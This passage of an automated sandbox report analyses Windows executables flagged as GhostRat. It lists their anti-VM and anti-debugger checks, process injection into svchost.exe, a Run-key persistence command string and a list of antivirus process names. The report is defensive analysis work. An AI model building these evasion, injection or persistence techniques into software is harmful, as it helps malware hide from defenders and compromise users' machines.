Source: Fj0RhXL.exe, 00000006.00000002.3621039775.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078234301.00000000008B4000.00000020.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157985252.00000000008B4000.00000020.00000001.01000000.00000005.sdmp

Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	RDTSC instruction interceptor: First address: BC92C8 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 xor cl, FFFFFF9Ah 0x00000005 mov eax, ebp 0x00000007 rdtsc
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	RDTSC instruction interceptor: First address: BF0B47 second address: 102AF4A instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 movzx eax, di 0x00000006 pop eax 0x00000007 cwd 0x00000009 jmp 00007F2ACC80EC87h 0x0000000e pop esi 0x0000000f movzx edx, cx 0x00000012 jmp 00007F2ACC5BCEC8h 0x00000017 pop ebx 0x00000018 xchg dh, dl 0x0000001a movsx edx, di 0x0000001d pop edx 0x0000001e jmp 00007F2ACC66607Ah 0x00000023 ret 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	RDTSC instruction interceptor: First address: 9BEAAF second address: 9BEAB3 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 pop edi 0x00000004 rdtsc
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	RDTSC instruction interceptor: First address: 9BEAB3 second address: 8F4D48 instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 3E4A5909h 0x00000007 pop ebp 0x00000008 xchg bh, bl 0x0000000a jmp 00007F2ACC60AD4Ah 0x0000000f pop ebx 0x00000010 rdtsc

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Special instruction interceptor: First address: 102AF4A instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Window / User API: threadDelayed 3122

Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Dropped PE file which has not been started: C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll			Jump to dropped file
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Dropped PE file which has not been started: C:\Program Files (x86)\IemFNe\MSVCP140.dll			Jump to dropped file

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_0-18873

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_0-19201
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_0-19010
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

API coverage: 1.0 %

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe TID: 7596	Thread sleep time: -93000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe TID: 7344	Thread sleep time: -31220s >= -30000s			Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Last function: Thread delayed

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Thread sleep count: Count: 3122 delay: -10

Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h		6_2_6C37270F
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C37270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C372771h		7_2_6C37270F

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D895F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

6_2_03D895F0

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D85BF0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,

6_2_03D85BF0

Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.0000000002491000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Fj0RhXL.exe, 00000006.00000002.3621818017.000000000135E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	API call chain: ExitProcess graph end node	graph_0-19347
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	API call chain: ExitProcess graph end node	graph_0-19203
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	API call chain: ExitProcess graph end node	graph_6-111222
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-18903

Hides threads from debuggers

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Code function: 0_2_0429A505 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0429A505

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D9BC4A VirtualProtect ?,-00000001,00000104,?

6_2_03D9BC4A

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

6_2_02F0C5FC

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_04290B11 mov eax, dword ptr fs:[00000030h]	0_2_04290B11
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02EB05B8 mov eax, dword ptr fs:[00000030h]	6_2_02EB05B8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02EB05B0 mov eax, dword ptr fs:[00000030h]	6_2_02EB05B0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_032B00DB mov eax, dword ptr fs:[00000030h]	6_2_032B00DB

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_02F14407 GetProcessHeap,

6_2_02F14407

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_0429A505 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0429A505
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_1000A501 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_1000A501
Source: C:\Users\user\Desktop\N6xnw0iEGs.exe	Code function: 0_2_1000D3E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_1000D3E6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F08697 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_02F08697
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_02F06925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_02F06925
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D98AA0 Sleep,CloseHandle,CloseHandle,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,	6_2_03D98AA0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03DA0B07 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_03DA0B07
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_03D9A49B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_03D9A49B
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6C3D1F6A
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6C3D6D68
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 6_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6C3D1F75
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6C3D6D68
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6C3D1F75
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: 7_2_6C3D1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6C3D1F6A

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_02F05810 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,

6_2_02F05810

Contains functionality to inject threads in other processes

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D88CE0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,

6_2_03D88CE0

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe		6_2_03D88CE0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe		6_2_03D88CE0

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Process created: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe"

Jump to behavior

Source: Fj0RhXL.exe, 00000006.00000002.3623114909.0000000003F54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inProgram Manager
Source: N6xnw0iEGs.exe, N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: N6xnw0iEGs.exe, N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SHELL_TrayWnd
Source: N6xnw0iEGs.exe, 00000000.00000002.2992675426.0000000010017000.00000002.00001000.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000002.2991710838.0000000004290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Pragma: no-cacheGETlibcef.dllv4.0.30319%s%s\%slib%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClass1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,GetUserNameW,wsprintfW,GetFileAttributesW,wsprintfW,GetFileAttributesW,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,	6_2_03D85BF0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_03DA93C5
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoA,	6_2_03DAC31C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_03DA9305
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_03DA9134
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_03DA90D9
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_03DA9032
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_03DA8F3D
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_03DABCEC
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_03DA9468
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_03DABC12
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_03DA942C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_6C3EFC04
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6C3EFCF0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: EnumSystemLocalesA,	6_2_6C3EFCC6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6C3EFD57
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_6C3EFD93
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoA,	6_2_6C3F3FD6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6C3EF83C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6C3EF931
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6C3EF9D8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_6C3EFA33
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_6C3EE436
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6C3EE510
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_6C3EFC04
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_6C3EFCF0
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: EnumSystemLocalesA,	7_2_6C3EFCC6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_6C3EFD57
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	7_2_6C3EFD93
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoA,	7_2_6C3F3FD6
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_6C3EF83C
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_6C3EF931
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_6C3EF9D8
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_6C3EFA33
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	7_2_6C3EE436
Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_6C3EE510

Source: C:\Users\user\Desktop\N6xnw0iEGs.exe

Code function: 0_2_005344E1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005344E1

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

6_2_03D85BF0

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03DA498D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

6_2_03DA498D

Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

Code function: 6_2_03D87F70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,

6_2_03D87F70

Source: Fj0RhXL.exe	Binary or memory string: acs.exe
Source: Fj0RhXL.exe	Binary or memory string: kxetray.exe
Source: Fj0RhXL.exe	Binary or memory string: avcenter.exe
Source: Fj0RhXL.exe	Binary or memory string: vsserv.exe
Source: Fj0RhXL.exe	Binary or memory string: KSafeTray.exe
Source: Fj0RhXL.exe	Binary or memory string: cfp.exe
Source: Fj0RhXL.exe	Binary or memory string: avp.exe
Source: Fj0RhXL.exe	Binary or memory string: 360Safe.exe
Source: N6xnw0iEGs.exe, Fj0RhXL.exe	Binary or memory string: 360tray.exe
Source: Fj0RhXL.exe	Binary or memory string: rtvscan.exe
Source: Fj0RhXL.exe	Binary or memory string: TMBMSRV.exe
Source: Fj0RhXL.exe	Binary or memory string: ashDisp.exe
Source: Fj0RhXL.exe	Binary or memory string: 360Tray.exe
Source: Fj0RhXL.exe	Binary or memory string: avgwdsvc.exe
Source: Fj0RhXL.exe	Binary or memory string: AYAgent.aye
Source: Fj0RhXL.exe	Binary or memory string: QUHLPSVC.EXE
Source: Fj0RhXL.exe	Binary or memory string: RavMonD.exe
Source: Fj0RhXL.exe	Binary or memory string: Mcshield.exe
Source: Fj0RhXL.exe	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3d80000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13a300b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3bf05bf.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3b41004.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13e7a73.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3d80000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3bf05bf.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13e7a73.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Fj0RhXL.exe.3b41004.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.3a81053.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.13a300b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.4fd5a53.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.Fj0RhXL.exe.3a81053.2.unpack, type: UNPACKEDPE
